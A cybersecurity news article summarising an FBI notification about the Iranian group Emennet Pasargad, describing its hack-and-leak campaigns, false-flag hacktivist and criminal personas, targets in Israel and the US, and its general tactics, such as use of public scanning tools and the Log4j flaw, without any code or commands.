FBI reveals Iranian cyber group Emennet Pasargad executing hack-and-leak operations using false-flag personas

The Federal Bureau of Investigation (FBI) warned of ongoing hack-and-leak cyber operations conducted by the Iranian cyber group Emennet Pasargad. The operations intend to undermine public confidence in the security of the victim’s network and data and embarrass victim companies and targeted countries. These hack-and-leak campaigns involve a combination of hacking/theft of data and information operations that impact victims through financial losses and reputational damage. 

Early this year, the Emennet Pasargad group conducted a cyber attack against a US-based organization as a means to target the Iranian opposition group The People’s Mujahedin (aka MEK), the FBI’s cyber division identified in a Private Industry Notification, released Thursday. “As a part of this operation, Emennet leaked information concerning personally identifiable information (PII) they presumably obtained via their compromise of the organization’s network. Emennet’s activity resulted in destructive effects on victim infrastructure,” it adds. 

The FBI warns that organizations Iran perceives as affiliated with the MEK are at an elevated risk of cyber exploitation or attack activities. “Although Emennet personas may exaggerate their level of access to a victim network or the volume of victim data stolen, the FBI judges that each of these campaigns likely start with some level of cyber intrusion. Historically, the actors choose victims by conducting online research into leading businesses across several sectors,” the FBI adds. 

Emennet cyber actors typically demonstrate a preference for websites running PHP code or those with externally accessible ‘myssql’ databases, the FBI said. “In most cases, these actors then use open-source penetration testing tools such as SQLmap and Acunetix. In addition to Emennet’s hack-and-leak operations, these actors have used website defacements and destructive encryption malware to cause further harm to victims’ networks.” 

Based on an analysis of FBI-acquired information, the agency attributes false-flag personas of the Emennet Pasargad group to hackers of Savior Pro, a Palestinian hacktivist group persona, active between 2020 and 2022, and Deus cyber-criminal persona, active in 2021.

In the case of Savior Pro, the FBI said that Emennet conducted four cyber campaigns that targeted entities across multiple sectors in Israel. The campaigns, most of which occurred around Qods Day, involved hack-and-leak activity and website defacements. Their latest actions, which occurred in April this year, involved a blended campaign of hacking and psychological operations to promote a political narrative.

The Emennet Pasargad group also operated under the cyber-criminal persona of Deus while conducting a lock-and-leak operation targeting an Israeli call service center. According to reports, Emennet cyber actors encrypted victim computers and leaked company data. Emennet then offered to sell the data on public forums and used a Deus Telegram channel to amplify their messaging regarding the intrusion and leaked documents.

The FBI said that the Emennet Pasargad group is likely more opportunistic in choosing victims rather than targeting specific entities. However, victim trends appear to show their preference for companies with significant traffic and a large customer base. In furtherance of Emennet’s information operations, the group often amplifies and promotes the theft and leaking of victim data on their dedicated leak websites, Telegram, and online hacking and illicit access trading forums. In addition, the hackers typically create social media accounts for each false-flag persona to generate additional attention to their activity. 

The FBI has also observed Emennet amplifying information operations by contacting news media organizations and using email marketing services. This tactic was previously observed during their campaign against the 2020 U.S. Presidential election. 

The Emennet Pasargad hackers avoid attribution by executing false-flag campaigns under multiple personas, such as hacktivists or cybercriminal groups, the FBI said. “Since at least 2020, Emennet targeted entities primarily in Israel with cyber-enabled information operations that included an initial intrusion, theft, and subsequent leak of data, followed by amplification through social media and online forums, and in some cases the deployment of destructive encryption malware,” it adds.

“Although Emennet’s latest attacks have primarily targeted Israel, the FBI judges these techniques may be used to target US entities as seen during Emennet’s cyber-enabled information operation that targeted the 2020 US Presidential election,” it adds.

Within the past year, the FBI has identified a destructive cyber attack against a U.S. organization – indicating the group remains a cyber threat to America. 

The FBI previously disseminated a Private Industry Notification on the Emennet Pasargad on January 26 this year. “In this product, the FBI identified numerous Tactics, Techniques, and Procedures used by this cyber threat actor. The FBI is re-emphasizing Emennet’s focus on the techniques to highlight how the group enables access to target websites. Emennet will leverage their access to edit content on victim websites in an effort to further their information operations,” it adds.

The FBI further assesses Emennet Pasargad group will likely conduct research for newly identified vulnerabilities on Ckeditor and commonly used content management systems, specifically Drupal and WordPress.

The FBI and multiple U.S. and foreign partners disseminated a joint cybersecurity advisory last December, providing mitigation guidance related to vulnerabilities in Apache’s Log4j software library. Emennet exploited a Log4j vulnerability CVE-2021-44228 for at least one U.S.-based organization that allowed the actors to access the organization’s web server. Emennet cyber actors used destructive capabilities to take down the organization’s web server and associated websites. 

The FBI recommends that its partners remain vigilant, and if the behaviors outlined in this notification are observed, they should contact their local FBI office.

Last month, Iranian state hackers executed malicious cyber operations against the Government of Albania in July and September, U.S. cybersecurity agencies detailed in a cybersecurity advisory. The notice provided information on recent cyber operations, including ransomware and disk wiper, rendering websites and services unavailable.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.